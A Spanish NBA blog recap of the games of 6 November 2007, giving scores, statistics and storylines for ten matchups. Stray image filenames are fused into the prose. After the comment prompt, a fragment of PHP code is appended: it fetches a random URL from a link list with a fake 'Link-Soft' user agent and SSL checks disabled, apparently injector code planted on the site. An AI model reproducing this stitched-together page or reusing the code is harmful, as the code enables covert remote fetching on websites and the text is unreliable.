La crónica (noche del 6/11/07)

07 de November de 2007 por MagicJohnson32

La lesión de Felton, el retorno de Jefferson, el morbo en el Madison, las alegrías de Krystowiak, el duelo Dwight-Al, el dominio de Yao, el balón de Theus, las distracciones de los Bulls, los récords de los Hornets y el ojo morado de LeBron James… Es la crónica de los partidos disputados la pasada madrugada en la NBA:

feltonfall

Suns 115 – Bobcats 83

Noche negra de los Bobcats: fueron aplastados por los Suns y Felton cayó lesionado. Finalmente parece que no es grave y el magnífico base podría incluso jugar contra los Sixes esta próxima madrugada. Los Suns, por su parte, no echaron en falta a Amaré Stodemire, que podría regresar esta noche en Atlanta. Ocho jugadores de Phoenix anotaron en dobles figuras y Diaw hizo de Nash al repartir 11 asistencias. Lo más sorprendente, en cualquier caso, fue el trabajo defensivo de los hombres de D’Antoni, que dejaron a su rival en 83 puntos y anularon por completo a Emeka Okafor, incapaz de anotar un solo punto en toda la noche.

Hawks 82 – Nets 87

Richard Jefferson ha vuelto. Tras una temporada negra, en la que se pasó más tiempo en la enfermería que en la pista, el alero de los Nets parece en gran forma y ha liderado la anotación de su equipo en los cuatro partidos disputados hasta ahora, tres de ellos sellados con victoria. Jefferson, que está compensando así el mal momento de Carter, logró 25 puntos ante los Hawks. Kidd también fue clave, ya que pese a quedarse en 9 puntos, fue el máximo reboteador (9) y máximo asistente (12) del partido. Por los Hawks, los dos Josh (Smith y Childress) aportaron 18 puntos cada uno. Smith logró además 7 rebotes y 6 asistencias para su equipo, en el que salieron de inicio los dos rookies, Law y Horford, que no brillaron.

Nuggets 112 – Knicks 119

El morbo precedió el duelo entre Nuggets y Knicks. Se trataba de la primera visita de los de Denver alaimadison escenario en el que la pasada temporada se produjo la escena más lamentable desde la pelea de Artest y compañía con varios aficionados del Auburn Hills de Detroit. Aquello acabó con siete jugadores suspendidos y cruce de declaraciones entre Isiah Thomas y George Karl. Pero anoche lo único que se vio en el Madison fue baloncesto. Los Knicks tiraron del cuarteto Marbury-Crawford-Randolph-Curry, todos ellos por encima de los 20 puntos, para imponerse a los Nuggets, en los que Iverson volvió a ser el mejor con 32 puntos. Un parcial de 20-37 en el último cuarto dio el triunfo a los locales.

Raptors 85 – Bucks 112

El de ayer fue un gran día para Larry Krystowiak. El técnico de los Bucks no vio la aplastante victoria de dmasonsu equipo sobre unos tristes Raptors debido al parto de su mujer, que tuvo gemelos. Los hechos extraordinarios no se acaban ahí: Desmond Mason logró 10 de 10 en tiros de campo, incluyendo varias suspensiones, que no vendrían a ser su especialidad, y encabezó el espectacular acierto de su equipo, que finalizó con un 60% pero se movió hasta los últimos minutos por encima del 65%. Por los Raptors destacó el nefasto partido de sus titulares, que apenas sumaron 28 puntos. Chris Bosh se quedó en 1 punto en 16 minutos de juego, y sólo algunos suplentes mantuvieron el tipo, como Dixon (20 puntos), Humphries (16 y 9 rebotes) o Calderón (9 y 8 asistencias).

Magic 111 – Wolves 103

El duelo Dwight Howard vs Al Jefferson, dos de los mejores interiores jóvenes de la liga, no defraudó. 28dwightvswolves puntos y 16 cosechó el jugador de los Magic, que además se llevó el triunfo; 25 y 10 logró el de los Wolves. Por Orlando también brillaron Rashard Lewis, con 7 de 9 en triples (tres de ellos consecutivos para sentenciar el partido) y Carlos Arroyo, que tuvo uno de esos escasos días buenos y, en ausencia de Jameer Nelson, anotó 18 puntos y dio 6 asistencias. Otro que jugó por encima del nivel que acostumbra es Jaric, que logró 10 puntos y 10 asistencias. Además de la derrota, los Wolves perdieron a McCants por una torcedura de tobillo en el primer cuarto, cuando sumaba 10 puntos sin fallo.

yaoduncanSpurs 81 – Rockets 89

Yao dominó a Duncan. Cuatro palabras bastan para explicar la victoria de los Rockets sobre los Spurs, en la primera derrota de los de Popovic en lo que va de temporada. En un partido de baja anotación, el pívot chino sumó 28 puntos con 12 de 24 en tiros, 13 rebotes, 6 asistencias y 3 tapones en 43 minutos de juego. Tras él, los máximos anotadores de los Rockets fueron dos suplentes, Wells y James, con 14 y 13 respectivamente. McGrady se quedó en 12, con 4 de 14 en tiros, pero aportó 9 rebotes y 6 asistencias. Similar actuación tuvo Duncan, 14 puntos con 5 de 15, más 10 rebotes y 3 tapones. Parker y Ginóbili, de nuevo como sexto hombre, sí rindieron a gran nivel: 21 y 23 puntos respectivamente. El primer encuentro Scola-Oberto, pareja titular de la mejor selección argentina de la historia, resultó decepcionante: 0 puntos.

Clippers 97 – Bulls 91 mobleydeng

Los Clippers están encontrando vías para ganar sin Elton Brand. Los Bulls parecen haberlas olvidado: 0-4 es el balance que acumulan en este inicio de temporada, posiblemente afectados por los rumores que han situado a Kobe Bryant en el equipo. Cuttino Mobley fue el mayor responsable de la victoria de los Clippers, que suman 3 victorias en tres partidos. 33 puntos con 13 de 17 anotó el ex rocket, que además tuvo en Maggette (18-10-5) y Kaman (16-11) sus mejores aliados. Deng mejoró mucho sus prestaciones, con 22 puntos y 8 rebotes, pero los Bulls volvieron a presentar pobres porcentajes (35,7%).

kingssonicsSonics 98 – Kings 104

Al fin, Reggie Theus tuvo algo que celebrar en su recién estrenada carrera como entrenador. Los Knigs remontaron 20 puntos a los Sonics para lograr su primer triunfo de la temporada, algo que aún no ha conseguido el equipo de Seattle. Kevin Martin, Salmons y Brad Miller fueron los mejores de los californianos, mientras Durant y Szczerbiak destacaron por el equipo visitante, que arrastra un 0-4 de inicio por primera vez en 30 años. Al final Theus se guardó el balón de recuerdo de su primera victoria al frente de un banquillo NBA.

Hornets 118 – Lakers 104

pejashootsStojakovic acribilló a los Lakers con 10 de 13 en triples, logró el récord de la franquicia (superó los ocho logrados por Wesley) y llevó a los Hornets a igualar el mejor arranque de temporada de su historia, 4-0, como el año pasado. Chris Paul, con las facilidades que le dio Peja, se apuntó a esto de romper récords y repartió 21 asistencias, dos más que la marca estabecida en su día por Muggsy Bogues. De nada valió el buen partido de Kobe Bryant, autor de 28 puntos (11 de 20 en tiros), 7 asistencias, 6 rebotes y 3 tapones. Sólo Turiaf, con 15 puntos, y Farmar y Radmanovic, con 11, anotaron en dobles dígitos para los Lakers, que quedan con un balance de 2-2

baronlebron Cavs 108 – Warriors 104

Es oficial: los Warriors pueden preocuparse. Una de las más agradables sorpresas de la pasada temporada acumula cuatro derrotas y ninguna victoria. La de anoche fue ante un gran LeBron James, que firmó 24 puntos, 14 rebotes,9 asistencias y 3 tapones, y estuvo acompañado a la perfección por Ilgauskas (22-13) y Daniel Gibson, que logró 22 puntos y el triple de la victoria a 19 segundos para el final. Por los Warriors, Davis hizo 29 y 10 asistencias, Ellis anotó 22 y Al Harrington volvió a estar a buen nivel con 19-10-4 y un mate por encima de LeBron James que le valió una gran ovación del público. Al final, el que rió fue LeBron, pese al ojo morado con el que acabó el partido.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>